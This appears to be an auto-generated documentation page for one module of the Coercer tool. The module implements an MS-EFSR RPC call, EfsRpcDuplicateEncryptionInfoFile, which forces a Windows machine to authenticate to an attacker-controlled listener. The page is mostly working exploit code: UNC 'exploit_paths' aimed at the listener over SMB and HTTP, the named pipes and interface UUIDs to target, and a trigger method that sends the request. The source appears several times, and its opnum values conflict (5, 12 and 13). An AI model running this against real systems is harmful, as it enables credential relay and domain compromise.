coercer.methods.MS_EFSR.EfsRpcDuplicateEncryptionInfoFile

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcDuplicateEncryptionInfoFile.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
 14class EFS_RPC_BLOB(NDRSTRUCT):
 15    structure = (
 16        ('Data', DWORD),
 17        ('cbData', PCHAR),
 18    )
 19
 20
 21class _EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
 22    """
 23    Structure to make the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 24    """
 25    opnum = 13
 26    structure = (
 27        ('SrcFileName', WSTR), # Type: wchar_t *
 28        ('DestFileName', WSTR), # Type: wchar_t *
 29        ('dwCreationDisposition', DWORD), # Type: DWORD
 30        ('dwAttributes', DWORD), # Type: DWORD
 31        ('RelativeSD', EFS_RPC_BLOB), # Type: EFS_RPC_BLOB *
 32        ('bInheritHandle', BOOL), # Type: BOOL
 33    )
 34
 35
 36class _EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
 37    """
 38    Structure to parse the response of the RPC call to EfsRpcDuplicateEncryptionInfoFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 39    """
 40    structure = ()
 41
 42
 43class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
 44    """
 45    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 46
 47    Method found by:
 48     - [@topotam77](https://twitter.com/topotam77)
 49    """
 50
 51    exploit_paths = [
 52        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 53        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 54        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 55        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 56    ]
 57
 58    access = {
 59        "ncan_np": [
 60            {
 61                "namedpipe": r"\PIPE\efsrpc",
 62                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 63                "version": "1.0"
 64            },
 65            {
 66                "namedpipe": r"\PIPE\lsarpc",
 67                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 68                "version": "1.0"
 69            },
 70            {
 71                "namedpipe": r"\PIPE\samr",
 72                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 73                "version": "1.0"
 74            },
 75            {
 76                "namedpipe": r"\PIPE\lsass",
 77                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 78                "version": "1.0"
 79            },
 80            {
 81                "namedpipe": r"\PIPE\netlogon",
 82                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 83                "version": "1.0"
 84            },
 85        ],
 86        "ncacn_ip_tcp": [
 87            {
 88                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 89                "version": "1.0"
 90            },
 91            {
 92                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 93                "version": "1.0"
 94            }
 95        ]
 96    }
 97
 98    protocol = {
 99        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
100        "shortname": "MS-EFSR"
101    }
102
103    function = {
104        "name": "EfsRpcDuplicateEncryptionInfoFile",
105        "opnum": 12,
106        "vulnerable_arguments": ["SrcFileName"]
107    }
108
109    def trigger(self, dcerpc_session, target):
110        if dcerpc_session is not None:
111            try:
112                request = _EfsRpcDuplicateEncryptionInfoFile()
113                request['SrcFileName'] = self.path
114                request['DestFileName'] = self.path
115                request['dwCreationDisposition'] = 0
116                request['dwAttributes'] = 0
117                request['RelativeSD'] = EFS_RPC_BLOB()
118                request['bInheritHandle'] = 0
119                resp = dcerpc_session.request(request)
120                return ""
121            except Exception as err:
122                return err
123        else:
124            print("[!] Error: dce is None, you must call connect() first.")
125            return None
class EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
15class EFS_RPC_BLOB(NDRSTRUCT):
16    structure = (
17        ('Data', DWORD),
18        ('cbData', PCHAR),
19    )

This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type

structure = (('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
impacket.dcerpc.v5.ndr.NDR
NDR
referent
commonHdr
commonHdr64
structure64
align
item
fields
changeTransferSyntax
getDataLen
isNDR
dumpRaw
dump
calculatePad
pack
unpack
impacket.dcerpc.v5.ndr.NDRSTRUCT
getData
fromString
getAlignment
impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
isPointer
isUnion
getDataReferents
getDataReferent
calcPackSize
getArrayMaximumSize
getArraySize
fromStringReferents
fromStringReferent
calcUnPackSize
class EfsRpcDuplicateEncryptionInfoFile(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 44class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
 45    """
 46    Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 47
 48    Method found by:
 49     - [@topotam77](https://twitter.com/topotam77)
 50    """
 51
 52    exploit_paths = [
 53        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 54        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 55        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 56        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 57    ]
 58
 59    access = {
 60        "ncan_np": [
 61            {
 62                "namedpipe": r"\PIPE\efsrpc",
 63                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 64                "version": "1.0"
 65            },
 66            {
 67                "namedpipe": r"\PIPE\lsarpc",
 68                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 69                "version": "1.0"
 70            },
 71            {
 72                "namedpipe": r"\PIPE\samr",
 73                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 74                "version": "1.0"
 75            },
 76            {
 77                "namedpipe": r"\PIPE\lsass",
 78                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 79                "version": "1.0"
 80            },
 81            {
 82                "namedpipe": r"\PIPE\netlogon",
 83                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 84                "version": "1.0"
 85            },
 86        ],
 87        "ncacn_ip_tcp": [
 88            {
 89                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 90                "version": "1.0"
 91            },
 92            {
 93                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 94                "version": "1.0"
 95            }
 96        ]
 97    }
 98
 99    protocol = {
100        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
101        "shortname": "MS-EFSR"
102    }
103
104    function = {
105        "name": "EfsRpcDuplicateEncryptionInfoFile",
106        "opnum": 12,
107        "vulnerable_arguments": ["SrcFileName"]
108    }
109
110    def trigger(self, dcerpc_session, target):
111        if dcerpc_session is not None:
112            try:
113                request = _EfsRpcDuplicateEncryptionInfoFile()
114                request['SrcFileName'] = self.path
115                request['DestFileName'] = self.path
116                request['dwCreationDisposition'] = 0
117                request['dwAttributes'] = 0
118                request['RelativeSD'] = EFS_RPC_BLOB()
119                request['bInheritHandle'] = 0
120                resp = dcerpc_session.request(request)
121                return ""
122            except Exception as err:
123                return err
124        else:
125            print("[!] Error: dce is None, you must call connect() first.")
126            return None

Coercing a machine to authenticate using function EfsRpcDuplicateEncryptionInfoFile (opnum 5) of MS-EFSR Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcDuplicateEncryptionInfoFile', 'opnum': 12, 'vulnerable_arguments': ['SrcFileName']}
def trigger(self, dcerpc_session, target):
110    def trigger(self, dcerpc_session, target):
111        if dcerpc_session is not None:
112            try:
113                request = _EfsRpcDuplicateEncryptionInfoFile()
114                request['SrcFileName'] = self.path
115                request['DestFileName'] = self.path
116                request['dwCreationDisposition'] = 0
117                request['dwAttributes'] = 0
118                request['RelativeSD'] = EFS_RPC_BLOB()
119                request['bInheritHandle'] = 0
120                resp = dcerpc_session.request(request)
121                return ""
122            except Exception as err:
123                return err
124        else:
125            print("[!] Error: dce is None, you must call connect() first.")
126            return None